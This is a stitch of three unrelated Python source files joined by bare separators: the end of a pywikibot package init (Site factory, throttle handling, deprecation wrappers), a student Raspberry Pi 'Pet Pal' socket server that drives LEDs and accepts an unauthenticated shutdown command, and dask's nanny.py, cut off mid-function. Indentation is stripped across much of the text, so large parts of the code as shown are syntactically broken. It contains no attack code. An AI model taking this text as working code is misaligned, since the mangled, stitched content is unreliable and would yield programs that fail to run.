This will prevent the bot from breaking completely when a new type
is introduced.
    This data type is just a JSON container.
"""
_items = ('json',)
def __init__(self, json):
"""
Create a new WbUnknown object.
@param json: Wikibase JSON
        @type json: dict
"""
self.json = json
def toWikibase(self):
"""
Return the JSON object for the Wikibase API.
@return: Wikibase JSON
@rtype: dict
"""
return self.json
@classmethod
def fromWikibase(cls, json):
"""
Create a WbUnknown from the JSON data given by the Wikibase API.
@param json: Wikibase JSON
@type json: dict
@rtype: pywikibot.WbUnknown
"""
return cls(json)
_sites = {}
_url_cache = {} # The code/fam pair for each URL
def _code_fam_from_url(url):
"""Set url to cache and get code and family from cache.
Site helper method.
@param url: The site URL to get code and family
@type url: string
@raises SiteDefinitionError: Unknown URL
"""
if url not in _url_cache:
matched_sites = []
        # Iterate through all families and check which one applies to
        # the given URL
for fam in config.family_files:
family = Family.load(fam)
code = family.from_url(url)
if code is not None:
matched_sites.append((code, family))
if not matched_sites:
# TODO: As soon as AutoFamily is ready, try and use an
# AutoFamily
raise SiteDefinitionError("Unknown URL '{0}'.".format(url))
if len(matched_sites) > 1:
warning('Found multiple matches for URL "{0}": {1} (use first)'
.format(url, ', '.join(str(s) for s in matched_sites)))
_url_cache[url] = matched_sites[0]
return _url_cache[url]
def Site(code=None, fam=None, user=None, sysop=None, interface=None, url=None):
"""A factory method to obtain a Site object.
Site objects are cached and reused by this method.
By default rely on config settings. These defaults may all be overridden
using the method parameters.
@param code: language code (override config.mylang)
@type code: string
@param fam: family name or object (override config.family)
@type fam: string or Family
@param user: bot user name to use on this site (override config.usernames)
@type user: unicode
@param sysop: sysop user to use on this site (override config.sysopnames)
@type sysop: unicode
@param interface: site class or name of class in pywikibot.site
(override config.site_interface)
@type interface: subclass of L{pywikibot.site.BaseSite} or string
    @param url: Instead of code and fam, try to get a Site based on the
        URL. Still requires that a family supporting that URL exists.
@type url: string
@rtype: pywikibot.site.APISite
@raises ValueError: URL and pair of code and family given
@raises ValueError: Invalid interface name
@raises SiteDefinitionError: Unknown URL
"""
_logger = 'wiki'
if url:
# Either code and fam or only url
if code or fam:
raise ValueError(
'URL to the wiki OR a pair of code and family name '
'should be provided')
code, fam = _code_fam_from_url(url)
else:
# Fallback to config defaults
code = code or config.mylang
fam = fam or config.family
if not isinstance(fam, Family):
fam = Family.load(fam)
interface = interface or fam.interface(code)
# config.usernames is initialised with a defaultdict for each family name
family_name = str(fam)
code_to_user = config.usernames['*'].copy()
code_to_user.update(config.usernames[family_name])
user = user or code_to_user.get(code) or code_to_user.get('*')
code_to_sysop = config.sysopnames['*'].copy()
code_to_sysop.update(config.sysopnames[family_name])
sysop = sysop or code_to_sysop.get(code) or code_to_sysop.get('*')
if not isinstance(interface, type):
        # If it isn't a class, assume it is a string
try:
tmp = __import__('pywikibot.site', fromlist=[interface])
except ImportError:
raise ValueError('Invalid interface name: {0}'.format(interface))
else:
interface = getattr(tmp, interface)
if not issubclass(interface, BaseSite):
warning('Site called with interface=%s' % interface.__name__)
user = normalize_username(user)
key = '%s:%s:%s:%s' % (interface.__name__, fam, code, user)
if key not in _sites or not isinstance(_sites[key], interface):
_sites[key] = interface(code=code, fam=fam, user=user, sysop=sysop)
debug("Instantiated %s object '%s'"
% (interface.__name__, _sites[key]), _logger)
if _sites[key].code != code:
warn('Site %s instantiated using different code "%s"'
% (_sites[key], code), UserWarning, 2)
return _sites[key]
# alias for backwards-compatibility
getSite = redirect_func(Site, old_name='getSite', since='20150924')
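# Illustrative sketch (not part of this module): typical calls to the Site()
# factory above. The code/family and URL are ordinary example assumptions.
#
# enwiki = Site('en', 'wikipedia')                      # by code and family
# same = Site(url='https://en.wikipedia.org/wiki/Foo')  # resolved via from_url()
# assert enwiki is same                                 # cached and reused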
# These imports depend on Wb* classes above.
from pywikibot.page import ( # noqa: E402
Page,
FilePage,
Category,
Link,
User,
ItemPage,
PropertyPage,
Claim,
)
from pywikibot.page import ( # noqa: E402
html2unicode, url2unicode, unicode2html)
link_regex = re.compile(r'\[\[(?P<title>[^\]|[<>{}]*)(\|.*?)?\]\]')
@__deprecated('comment parameter for page saving method', since='20140604')
def setAction(s):
"""Set a summary to use for changed page submissions."""
config.default_edit_summary = s
def showDiff(oldtext, newtext, context=0):
"""
Output a string showing the differences between oldtext and newtext.
The differences are highlighted (only on compatible systems) to show which
changes were made.
"""
PatchManager(oldtext, newtext, context=context).print_hunks()
# Throttle and thread handling
def sleep(secs):
"""Suspend execution of the current thread for the given number of seconds.
Drop this process from the throttle log if wait time is greater than
30 seconds.
"""
if secs >= 30:
stopme()
time.sleep(secs)
def stopme():
"""
Drop this process from the throttle log, after pending threads finish.
Can be called manually if desired. Does not clean async_manager.
This should be run when a bot does not interact with the Wiki, or
when it has stopped doing so. After a bot has run stopme() it will
not slow down other bots any more.
"""
_flush(False)
def _flush(stop=True):
"""
Drop this process from the throttle log, after pending threads finish.
Wait for the page-putter to flush its queue. Also drop this process from
the throttle log. Called automatically at Python exit.
"""
_logger = 'wiki'
debug('_flush() called', _logger)
def remaining():
remainingPages = page_put_queue.qsize()
if stop:
# -1 because we added a None element to stop the queue
remainingPages -= 1
remainingSeconds = datetime.timedelta(
seconds=(remainingPages * config.put_throttle))
return (remainingPages, remainingSeconds)
if stop:
# None task element leaves async_manager
page_put_queue.put((None, [], {}))
num, sec = remaining()
if num > 0 and sec.total_seconds() > config.noisysleep:
output(color_format(
'{lightblue}Waiting for {num} pages to be put. '
'Estimated time remaining: {sec}{default}', num=num, sec=sec))
while _putthread.isAlive() and page_put_queue.qsize() > 0:
try:
_putthread.join(1)
except KeyboardInterrupt:
if input_yn('There are {0} pages remaining in the queue. '
'Estimated time remaining: {1}\nReally exit?'
''.format(*remaining()),
default=False, automatic_quit=False):
return
# only need one drop() call because all throttles use the same global pid
try:
list(_sites.values())[0].throttle.drop()
log('Dropped throttle(s).')
except IndexError:
pass
atexit.register(_flush)
# Create a separate thread for asynchronous page saves (and other requests)
def async_manager():
"""Daemon; take requests from the queue and execute them in background."""
while True:
(request, args, kwargs) = page_put_queue.get()
if request is None:
break
request(*args, **kwargs)
page_put_queue.task_done()
def async_request(request, *args, **kwargs):
"""Put a request on the queue, and start the daemon if necessary."""
if not _putthread.isAlive():
try:
page_put_queue.mutex.acquire()
try:
_putthread.start()
except (AssertionError, RuntimeError):
pass
finally:
page_put_queue.mutex.release()
page_put_queue.put((request, args, kwargs))
# queue to hold pending requests
page_put_queue = Queue(config.max_queue_size)
# set up the background thread
_putthread = threading.Thread(target=async_manager)
# identification for debugging purposes
_putthread.setName('Put-Thread')
_putthread.setDaemon(True)
wrapper = _ModuleDeprecationWrapper(__name__)
wrapper._add_deprecated_attr('ImagePage', FilePage, since='20140924')
wrapper._add_deprecated_attr(
'cookie_jar', replacement_name='pywikibot.comms.http.cookie_jar',
since='20150921')
wrapper._add_deprecated_attr(
'PageNotFound', _DeprecatedPageNotFoundError,
warning_message=('{0}.{1} is deprecated, and no longer '
'used by pywikibot; use http.fetch() instead.'),
since='20140924')
wrapper._add_deprecated_attr(
'UserActionRefuse', _EmailUserError,
warning_message='UserActionRefuse is deprecated; '
'use UserRightsError and/or NotEmailableError instead.',
since='20141218')
wrapper._add_deprecated_attr(
'QuitKeyboardInterrupt', _QuitKeyboardInterrupt,
warning_message='pywikibot.QuitKeyboardInterrupt is deprecated; '
'use pywikibot.bot.QuitKeyboardInterrupt instead.',
since='20150619')
wrapper._add_deprecated_attr(
'UploadWarning', _UploadWarning,
warning_message='pywikibot.UploadWarning is deprecated; '
'use APISite.upload with a warning handler instead.',
since='20150921')
wrapper._add_deprecated_attr(
'MediaWikiVersion', _MediaWikiVersion,
warning_message='pywikibot.MediaWikiVersion is deprecated; '
'use pywikibot.tools.MediaWikiVersion instead.',
since='20180827')
|
main.py
|
"""Team Lightning Project 2017 Pet Pal Home-Care System
Author: Ben Dodd (mitgobla)
Version: 1.0.2
Date: 20/03/17"""
import socket #Used to create the server
import sys #Used to terminate the program
import time #Used to pausing and time management
import os #Used to gather temperature
from threading import Thread #Used to run server more efficiently
import pigpio #Used for the control of LEDs
HOST = '192.168.1.64' #Local IP address of the PI when running on the BTBusinessHub
PORT = 80 #Unblocked HTTP port
RED_PIN = 27 #GPIO Pin for RED LED
GREEN_PIN = 17 #GPIO Pin for GREEN LED
BLUE_PIN = 22 #GPIO Pin for BLUE LED
class Bowl(): #Ultrasonic Sensor Module
"""Class used to store and calculate bowl values"""
def __init__(self): #Creates all the variables to be used by the class
"""Class used to store and calculate bowl values"""
#Status: stores the state of the bowl e.g. calibrating, fill, etc.
self.status = 'Need Setup'
#Depth: stores the depth of the bowl e.g. full, empty, etc.
self.depth = 'Empty'
print("Created bowl module")
def set_status(self, new_status):
"""Change the status of the bowl""" #<---
self.status = new_status
print("Bowl Status: ", self.status)
return self.status
def set_depth(self, new_depth):
"""Change the depth value of the bowl""" #<---
self.depth = new_depth
print("Bowl Depth: ", self.depth)
return self.depth
def get_depth(self):
"""Get the depth value of the bowl""" #<---
print("Bowl Depth: ", self.depth)
return self.depth
def get_status(self):
"""Get the status of the bowl""" #<---
print("Bowl Status: ", self.status)
return self.status
class Temperature(): #Temperature module
"""Class used to store and calculate temperature values"""
def __init__(self):
"""Class used to store and calculate temperature values"""
self.temperature = 'Need Setup' #Stores values like Hot, Mild, etc.
print("Created temperature module")
def set_temperature(self, new_temperature):
"""Change the temperature value of the hub""" #<---
self.temperature = new_temperature
print("Temperature: ", self.temperature)
return self.temperature
def get_temperature(self):
"""Get the temperature value of the hub""" #<---
print("Temperature: ", self.temperature)
return self.temperature
class Lighting():
"""Class used to control LED lighting"""
def __init__(self):
"""Class used to control LED lighting"""
self.hub = pigpio.pi()
self.red_led = self.hub.set_PWM_dutycycle(27, 0) #Sets the RED LED brightness to 0
self.green_led = self.hub.set_PWM_dutycycle(17, 0)
self.blue_led = self.hub.set_PWM_dutycycle(22, 0)
print("Created LED module")
def reset(self):
"""Turns off all the LEDs"""
self.red_led = self.hub.set_PWM_dutycycle(27, 0)
self.green_led = self.hub.set_PWM_dutycycle(17, 0)
self.blue_led = self.hub.set_PWM_dutycycle(22, 0)
print("Reset ALL LEDS")
def red(self, brightness):
"""Configure the Red LED"""
if isinstance(brightness, str):
try:
if int(brightness) > 255:
self.red_led = self.hub.set_PWM_dutycycle(27, 255)
elif int(brightness) < 0:
self.red_led = self.hub.set_PWM_dutycycle(27, 0)
else:
self.red_led = self.hub.set_PWM_dutycycle(27, int(brightness))
print("Updated Brightness")
            except (TypeError, ValueError) as error_message:
print("Invalid brightness value.\n", error_message)
elif isinstance(brightness, int):
if brightness > 255:
self.red_led = self.hub.set_PWM_dutycycle(27, 255)
elif brightness < 0:
self.red_led = self.hub.set_PWM_dutycycle(27, 0)
else:
self.red_led = self.hub.set_PWM_dutycycle(27, brightness)
print("Updated Brightness")
else:
print("Invalid brightness value.")
def green(self, brightness):
"""Configure the Red LED"""
if isinstance(brightness, str):
try:
if int(brightness) > 255:
self.green_led = self.hub.set_PWM_dutycycle(17, 255)
elif int(brightness) < 0:
self.green_led = self.hub.set_PWM_dutycycle(17, 0)
else:
self.green_led = self.hub.set_PWM_dutycycle(17, int(brightness))
print("Updated Brightness")
            except (TypeError, ValueError) as error_message:
print("Invalid brightness value.\n", error_message)
elif isinstance(brightness, int):
if brightness > 255:
self.green_led = self.hub.set_PWM_dutycycle(17, 255)
elif brightness < 0:
self.green_led = self.hub.set_PWM_dutycycle(17, 0)
else:
self.green_led = self.hub.set_PWM_dutycycle(17, brightness)
print("Updated Brightness")
else:
print("Invalid brightness value.")
def blue(self, brightness):
"""Configure the Red LED"""
if isinstance(brightness, str):
try:
if int(brightness) > 255:
self.blue_led = self.hub.set_PWM_dutycycle(22, 255)
elif int(brightness) < 0:
self.blue_led = self.hub.set_PWM_dutycycle(22, 0)
else:
self.blue_led = self.hub.set_PWM_dutycycle(22, int(brightness))
print("Updated Brightness")
            except (TypeError, ValueError) as error_message:
print("Invalid brightness value.\n", error_message)
elif isinstance(brightness, int):
if brightness > 255:
self.blue_led = self.hub.set_PWM_dutycycle(22, 255)
elif brightness < 0:
self.blue_led = self.hub.set_PWM_dutycycle(22, 0)
else:
self.blue_led = self.hub.set_PWM_dutycycle(22, brightness)
print("Updated Brightness")
else:
print("Invalid brightness value.")
class Hub():
"""Class used for main server management"""
def __init__(self, host, port):
"""Class used for main server management"""
self.temp_module = None
self.bowl_module = None
self.led_module = None
self.server_running = False
self.mode = None
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.changeable_port = int(port)
self.server.bind((str(host), int(port)))
print("Created host and port")
except socket.error:
try:
self.changeable_port += 1
self.server.bind((str(host), self.changeable_port))
print('Created host and port')
except socket.error as error_message:
print("Failed to bind. Error:", str(error_message))
sys.exit()
def add_temperature_module(self):
"""Create a temperature module"""
self.temp_module = Temperature()
with os.popen('vcgencmd measure_temp') as measurement:
raw_temperature = measurement.read().strip()
celsius = int(raw_temperature[5:len(raw_temperature)-4])-15
if celsius/26 >= 0.66:
self.temp_module.set_temperature(b'Hot')
elif celsius/26 >= 0.33:
self.temp_module.set_temperature(b'Normal')
else:
self.temp_module.set_temperature(b'Cold')
print("Added Temperature module")
def set_temperature_module(self):
"""Update the temperature"""
with os.popen('vcgencmd measure_temp') as measurement:
raw_temperature = measurement.read().strip()
celsius = int(raw_temperature[5:len(raw_temperature)-4])-15
if celsius/26 >= 0.66:
self.temp_module.set_temperature(b'Hot')
elif celsius/26 >= 0.33:
self.temp_module.set_temperature(b'Normal')
else:
self.temp_module.set_temperature(b'Cold')
print("Updated Temperature Module")
def add_bowl_module(self):
#Status information:
#1: First time setup
#2: Calibrating
#3. Fill the Bowl
#4. Done Calibration
"""Create a Bowl module"""
self.bowl_module = Bowl()
self.bowl_module.set_status("1")
print("Added Bowl Module")
def set_bowl_module(self, depth):
"""Update the bowl"""
self.bowl_module.set_depth(depth)
print("Updated Bowl Module")
def set_bowl_status(self, status):
"""Update the bowl status"""
self.bowl_module.set_status(status)
print("Updated Bowl Module Status")
def add_led_module(self):
"""Gains control of the LEDs on the hub"""
self.led_module = Lighting()
self.led_module.red(255)
self.led_module.green(255)
print("Added LED Module")
def run_server(self):
"""Run the server side of the hub"""
        #--------------------- ADD MODULES HERE --------------
        self.add_bowl_module()
        self.add_temperature_module()
        self.add_led_module()
        #-----------------------------------------------------
        self.server_running = True
        #Run the LED visuals in a background thread so the server can accept connections
        Thread(target=self.run_visuals).start()
        self.server.listen(100)
print("Waiting for connections")
while self.server_running:
connection, address = self.server.accept()
print("Connected with ", address[0], ":", address[1])
#----------------------------------------------------
data = connection.recv(1024)
#----------------------------------------------------
#------------------ CODES ---------------------------
#1: Ultrasonic sensor
#1a: Calibrating
#1b: Fill Bowl
#1c: Calibrated
#1A: Full
#1B: Low
#1C: Empty
#2: Mobile Phone
#2a: Mode Temp
#2b: Mode Bowl
#2c: Mode None
#2A: Get Bowl
#2B: Get Temp
if data == b'1': #ULTRASONIC SENSOR HAS CONNECTED
print("Ultrasonic sensor has connected")
time.sleep(1) #ALLOW DELAY FOR DATA TO BE RECEIVED
try:
data = connection.recv(1024) #DEVICE IS SENDING INFORMATION
print("Data received from ultrasonic sensor")
except (ConnectionAbortedError, ConnectionResetError): #DEVICE HAS DISCONNECTED
break
#------------- PROCESS DATA --------------------
if not data: #DEVICE HAS DISCONNECTED CORRECTLY
break
elif data == b'1a': #DEVICE IS CALIBRATING
print("Ultrasonic sensor calibrating")
self.bowl_module.set_status("2")
elif data == b'1b': #DEVICE WANTS USER TO FILL BOWL
print("Ultrasonic sensor needs filling")
self.bowl_module.set_status("3")
elif data == b'1c': #DEVICE IS COMPLETE
print("Ultrasonic sensor completed")
self.bowl_module.set_status("4")
elif data == b'1A': #DEVICE IS FULL
print("Bowl is full")
self.bowl_module.set_depth(b'Full')
elif data == b'1B': #DEVICE IS LOW
print("Bowl is low")
self.bowl_module.set_depth(b'Low')
elif data == b'1C': #DEVICE IS EMPTY
print("Bowl is empty")
self.bowl_module.set_depth(b'Empty')
try:
connection.close()
except Exception:
pass
#--------------------------------------------------------------
elif data == b'2': #MOBILE PHONE HAS CONNECTED
print("Phone has connected")
time.sleep(1) #ALLOW DELAY FOR DATA TO BE RECEIVED
try:
data = connection.recv(1024) #DEVICE IS SENDING INFORMATION
print("Data received from phone")
except (ConnectionAbortedError, ConnectionResetError): #DEVICE HAS DISCONNECTED
break
#------------- PROCESS DATA --------------------
if not data:
break
elif data == b'2a':
self.mode = "Temp"
print("Mode changed to Temp")
elif data == b'2b':
self.mode = "Bowl"
print("Mode changed to Bowl")
elif data == b'2c':
self.mode = None
print("Mode changed to None")
elif data == b'2A':
time.sleep(1)
print("Sending depth")
connection.send(b'bowl '+self.bowl_module.get_depth())
elif data == b'2B':
print("Sending Temperature")
time.sleep(1)
connection.send(b'temp '+self.temp_module.get_temperature())
try:
connection.close()
except Exception:
pass
elif not data or data == b'forceshutdown':
connection.close()
self.server_running = False
self.server.close()
def run_visuals(self):
"""Run the visual side of the hub"""
while self.server_running:
while self.mode == "Temp":
print("Temp Mode LED")
temp = self.temp_module.get_temperature()
if temp == b'Hot':
print("LED HOT")
self.led_module.red(255)
self.led_module.green(100)
self.led_module.blue(0)
                elif temp == b'Normal':
print("LED NORMAL")
self.led_module.red(0)
self.led_module.green(255)
self.led_module.blue(50)
else:
print("LED COLD")
self.led_module.red(0)
self.led_module.green(50)
self.led_module.blue(255)
time.sleep(15)
while self.mode == "Bowl":
print("Bowl mode LED")
status = self.bowl_module.get_status()
if status == "1":
print("LED RED")
self.led_module.red(255)
self.led_module.green(0)
self.led_module.blue(0)
elif status == "2":
print("LED PURPLE")
self.led_module.red(255)
self.led_module.green(0)
self.led_module.blue(255)
elif status == "3":
print("LED CYAN")
self.led_module.red(0)
self.led_module.green(255)
self.led_module.blue(255)
elif status == "4":
depth = self.bowl_module.get_depth()
if depth == b'Full':
self.led_module.red(0)
self.led_module.green(255)
self.led_module.blue(0)
elif depth == b'Low':
self.led_module.red(255)
self.led_module.green(255)
self.led_module.blue(0)
else:
self.led_module.red(255)
self.led_module.green(0)
self.led_module.blue(0)
time.sleep(15)
while self.mode is None:
self.led_module.reset()
time.sleep(5)
PET_PAL = Hub(HOST, PORT)
Thread(target=PET_PAL.run_server).start()
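#Illustrative client sketch (not part of the hub): querying the hub using the
#phone codes documented in run_server(). HOST and PORT reuse the constants above.
#
#client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#client.connect((HOST, PORT))
#client.send(b'2') #Identify as a mobile phone
#time.sleep(1)
#client.send(b'2B') #Request the temperature reading
#print(client.recv(1024)) #e.g. b'temp Normal'
#client.close()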
|
nanny.py
|
import asyncio
import errno
import logging
import os
import shutil
import threading
import uuid
import warnings
import weakref
from contextlib import suppress
from multiprocessing.queues import Empty
from time import sleep as sync_sleep
import psutil
from tornado import gen
from tornado.ioloop import IOLoop, PeriodicCallback
import dask
from dask.system import CPU_COUNT
from . import preloading
from .comm import get_address_host, unparse_host_port
from .comm.addressing import address_from_user_args
from .core import CommClosedError, RPCClosed, Status, coerce_to_address
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
TimeoutError,
get_ip,
json_load_robust,
mp_context,
parse_ports,
parse_timedelta,
silence_logging,
)
from .worker import Worker, parse_memory_limit, run
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
"""A process to manage worker processes
    The nanny spins up Worker processes, watches them, and kills or restarts
    them as necessary. It is necessary if you want to use the
    ``Client.restart`` method, or to restart the worker automatically if
    it gets to the terminate fraction of its memory limit.
The parameters for the Nanny are mostly the same as those for the Worker.
See Also
--------
Worker
"""
_instances = weakref.WeakSet()
process = None
status = Status.undefined
def __init__(
self,
scheduler_ip=None,
scheduler_port=None,
scheduler_file=None,
worker_port=0,
nthreads=None,
ncores=None,
loop=None,
local_dir=None,
local_directory=None,
services=None,
name=None,
memory_limit="auto",
reconnect=True,
validate=False,
quiet=False,
resources=None,
silence_logs=None,
death_timeout=None,
preload=None,
preload_argv=None,
preload_nanny=None,
preload_nanny_argv=None,
security=None,
contact_address=None,
listen_address=None,
worker_class=None,
env=None,
interface=None,
host=None,
port=None,
protocol=None,
config=None,
**worker_kwargs,
):
self._setup_logging(logger)
self.loop = loop or IOLoop.current()
if isinstance(security, dict):
security = Security(**security)
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args("worker")
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg["address"]
elif scheduler_ip is None and dask.config.get("scheduler-address"):
self.scheduler_addr = dask.config.get("scheduler-address")
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
if protocol is None:
protocol_address = self.scheduler_addr.split("://")
if len(protocol_address) == 2:
protocol = protocol_address[0]
if ncores is not None:
warnings.warn("the ncores= parameter has moved to nthreads=")
nthreads = ncores
self._given_worker_port = worker_port
self.nthreads = nthreads or CPU_COUNT
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = parse_timedelta(death_timeout)
self.preload = preload
if self.preload is None:
self.preload = dask.config.get("distributed.worker.preload")
self.preload_argv = preload_argv
if self.preload_argv is None:
self.preload_argv = dask.config.get("distributed.worker.preload-argv")
if preload_nanny is None:
preload_nanny = dask.config.get("distributed.nanny.preload")
if preload_nanny_argv is None:
preload_nanny_argv = dask.config.get("distributed.nanny.preload-argv")
self.Worker = Worker if worker_class is None else worker_class
self.env = env or {}
self.config = config or dask.config.config
worker_kwargs.update(
{
"port": worker_port,
"interface": interface,
"protocol": protocol,
"host": host,
}
)
self.worker_kwargs = worker_kwargs
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get(
"distributed.worker.memory.terminate"
)
if local_dir is not None:
warnings.warn("The local_dir keyword has moved to local_directory")
local_directory = local_dir
if local_directory is None:
local_directory = dask.config.get("temporary-directory") or os.getcwd()
if not os.path.exists(local_directory):
os.makedirs(local_directory)
self._original_local_dir = local_directory
local_directory = os.path.join(local_directory, "dask-worker-space")
else:
self._original_local_dir = local_directory
self.local_directory = local_directory
self.preloads = preloading.process_preloads(
self, preload_nanny, preload_nanny_argv, file_dir=self.local_directory
)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.nthreads)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {
"instantiate": self.instantiate,
"kill": self.kill,
"restart": self.restart,
# cannot call it 'close' on the rpc side for naming conflict
"get_logs": self.get_logs,
"terminate": self.close,
"close_gracefully": self.close_gracefully,
"run": self.run,
}
super().__init__(
handlers=handlers, io_loop=self.loop, connection_args=self.connection_args
)
self.scheduler = self.rpc(self.scheduler_addr)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100)
self.periodic_callbacks["memory"] = pc
if (
not host
and not interface
and not self.scheduler_addr.startswith("inproc://")
):
host = get_ip(get_address_host(self.scheduler.address))
self._start_port = port
self._start_host = host
self._interface = interface
self._protocol = protocol
self._listen_address = listen_address
Nanny._instances.add(self)
self.status = Status.init
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.nthreads)
async def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
with suppress(allowed_errors):
await asyncio.wait_for(
self.scheduler.unregister(address=self.worker_address), timeout
)
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@property
def local_dir(self):
"""For API compatibility with Nanny"""
warnings.warn("The local_dir attribute has moved to local_directory")
return self.local_directory
async def start(self):
"""Start nanny, start local process, start watching"""
await super().start()
ports = parse_ports(self._start_port)
for port in ports:
start_address = address_from_user_args(
host=self._start_host,
port=port,
interface=self._interface,
protocol=self._protocol,
security=self.security,
)
try:
await self.listen(
start_address, **self.security.get_listen_args("worker")
)
except OSError as e:
if len(ports) > 1 and e.errno == errno.EADDRINUSE:
continue
else:
raise e
else:
self._start_address = start_address
break
else:
raise ValueError(
f"Could not start Nanny on host {self._start_host}"
f"with port {self._start_port}"
)
self.ip = get_address_host(self.address)
for preload in self.preloads:
await preload.start()
logger.info(" Start Nanny at: %r", self.address)
response = await self.instantiate()
if response == Status.running:
assert self.worker_address
self.status = Status.running
else:
await self.close()
self.start_periodic_callbacks()
return self
async def kill(self, comm=None, timeout=2):
"""Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
return "OK"
deadline = self.loop.time() + timeout
await self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
async def instantiate(self, comm=None) -> Status:
"""Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(
host, self._given_worker_port
)
if self.process is None:
worker_kwargs = dict(
scheduler_ip=self.scheduler_addr,
nthreads=self.nthreads,
local_directory=self._original_local_dir,
services=self.services,
nanny=self.address,
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address,
)
worker_kwargs.update(self.worker_kwargs)
self.process = WorkerProcess(
worker_kwargs=worker_kwargs,
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit_sync,
worker=self.Worker,
env=self.env,
config=self.config,
)
if self.death_timeout:
try:
result = await asyncio.wait_for(
self.process.start(), self.death_timeout
)
except TimeoutError:
await self.close(timeout=self.death_timeout)
logger.error(
"Timed out connecting Nanny '%s' to scheduler '%s'",
self,
self.scheduler_addr,
)
raise
else:
try:
result = await self.process.start()
except Exception:
await self.close()
raise
return result
async def restart(self, comm=None, timeout=2, executor_wait=True):
async def _():
if self.process is not None:
await self.kill()
await self.instantiate()
try:
await asyncio.wait_for(_(), timeout)
except TimeoutError:
logger.error("Restart timed out, returning before finished")
return "timed out"
else:
return "OK"
@property
def _psutil_process(self):
pid = self.process.process.pid
try:
self._psutil_process_obj
except AttributeError:
self._psutil_process_obj = psutil.Process(pid)
if self._psutil_process_obj.pid != pid:
self._psutil_process_obj = psutil.Process(pid)
return self._psutil_process_obj
def memory_monitor(self):
"""Track worker's memory. Restart if it goes above terminate fraction"""
if self.status != Status.running:
return
if self.process is None or self.process.process is None:
return None
process = self.process.process
try:
proc = self._psutil_process
memory = proc.memory_info().rss
except (ProcessLookupError, psutil.NoSuchProcess, psutil.AccessDenied):
return
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning(
"Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction,
)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.is_alive()
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
def _on_exit_sync(self, exitcode):
self.loop.add_callback(self._on_exit, exitcode)
async def _on_exit(self, exitcode):
if self.status not in (
Status.init,
Status.closing,
Status.closed,
Status.closing_gracefully,
):
try:
await self._unregister()
except (EnvironmentError, CommClosedError):
if not self.reconnect:
await self.close()
return
try:
if self.status not in (
Status.closing,
Status.closed,
Status.closing_gracefully,
):
if self.auto_restart:
logger.warning("Restarting worker")
await self.instantiate()
elif self.status == Status.closing_gracefully:
await self.close()
except Exception:
logger.error(
"Failed to restart worker after its process exited", exc_info=True
)
@property
def pid(self):
return self.process and self.process.pid
def _close(self, *args, **kwargs):
warnings.warn("Worker._close has moved to Worker.close", stacklevel=2)
return self.close(*args, **kwargs)
def close_gracefully(self, comm=None):
"""
A signal that we shouldn't try to restart workers if they go away
This is used as part of the cluster shutdown process.
"""
self.status = Status.closing_gracefully
async def close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status == Status.closing:
await self.finished()
assert self.status == Status.closed
if self.status == Status.closed:
return "OK"
self.status = Status.closing
logger.info("Closing Nanny at %r", self.address)
for preload in self.preloads:
await preload.teardown()
self.stop()
try:
if self.process is not None:
await self.kill(timeout=timeout)
except Exception:
pass
self.process = None
await self.rpc.close()
self.status = Status.closed
if comm:
await comm.write("OK")
await ServerNode.close(self)
class WorkerProcess:
    # How often (in seconds) to check the msg queue during init
_init_msg_interval = 0.05
def __init__(
self,
worker_kwargs,
worker_start_args,
silence_logs,
on_exit,
worker,
env,
config,
):
self.status = Status.init
self.silence_logs = silence_logs
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
self.config = config
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
async def start(self) -> Status:
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == Status.running:
return self.status
if self.status == Status.starting:
await self.running.wait()
return self.status
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
name="Dask Worker process (from Nanny)",
kwargs=dict(
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env,
config=self.config,
),
)
self.process.daemon = dask.config.get("distributed.worker.daemon", default=True)
self.process.set_exit_callback(self._on_exit)
self.running = asyncio.Event()
self.stopped = asyncio.Event()
self.status = Status.starting
try:
await self.process.start()
except OSError:
